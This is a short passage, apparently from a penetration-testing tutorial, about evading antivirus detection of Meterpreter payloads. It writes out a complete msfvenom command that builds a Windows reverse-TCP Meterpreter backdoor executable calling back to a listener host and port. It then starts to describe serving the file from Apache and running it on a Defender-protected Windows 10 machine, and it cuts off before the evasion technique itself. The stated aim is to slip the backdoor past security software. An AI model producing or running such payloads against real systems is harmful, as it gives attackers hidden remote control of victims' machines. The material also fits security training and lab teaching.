Evading Meterpreter detection using C wrappers and custom encoders
Meterpreter is one of the most popular payloads used by security researchers. However, since it's popular, it is detected by most of the AV solutions out there and tends to get flagged in a flash.
This can be seen in the following steps:
- Let's generate a simple Metasploit executable using the
msfvenom -a x64 –-platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.204.143 LPORT=80 -o Desktop/Shell2.exe
command, as follows:Here, we created a simple reverse TCP Meterpreter executable backdoor using the
msfvenom
command. Additionally, we mentionedLHOST
andLPORT
, which isEXE
for the PE/COFF executable. We can see that the executable was generated successfully. - Let's move this executable to the
apache
folder and try downloading and executing it on a Windows 10 OS secured by Windows Defender and...